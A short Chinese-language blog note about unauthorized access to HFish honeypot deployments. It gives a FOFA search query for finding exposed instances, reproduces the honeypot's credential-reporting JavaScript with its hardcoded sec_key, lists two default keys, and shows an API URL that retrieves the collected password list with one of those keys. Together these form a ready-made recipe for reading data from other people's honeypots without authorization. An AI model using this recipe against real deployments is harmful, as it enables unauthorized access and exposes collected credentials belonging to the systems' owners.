蜜罐未授权整理

由于工作的原因,需要对互联网的蜜罐数据资源进行整理,然后再这里就当做个总结了

HFish

1
2
fofa搜索
app="HFish-扩展企业安全测试主动诱导型开源蜜罐框架系统"

过程

默认的官方部署的系统存在使用默认的KEY情况,在默认生成的蜜罐网站中存在的sec_key,可以直接进行获取相关的数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
function report() {
var login_field = $("#user_login").val();
var password = $("#user_pass").val();

$.ajax({
type: "POST",
url: "/api/v1/post/deep_report",
dataType: "json",
data: {
"name": "暗网钓鱼",
"info": login_field + "&&" + password,
"sec_key": "9cbf8a4dcb8e30682b927f352d6559a0"
},
success: function (e) {
if (e.code == "200") {
alert("账号密码错误");
} else {
console.log(e.msg)
}
},
error: function (e) {
console.log("fail")
}
});
}

默认使用的key主要

1
2
X85e2ba265d965b1929148d0f0e33133
9cbf8a4dcb8e30682b927f352d6559a0

根据推断第一个KEY是用于上报数据,第二个key应该是获取蜜罐数据信息。

可以直接通过相关蜜罐的接口获取蜜罐的数据信息
http://XXX.XXX.XXX.XXX:9001//api/v1/get/passwd_list?key=X85e2ba265d965b1929148d0f0e33133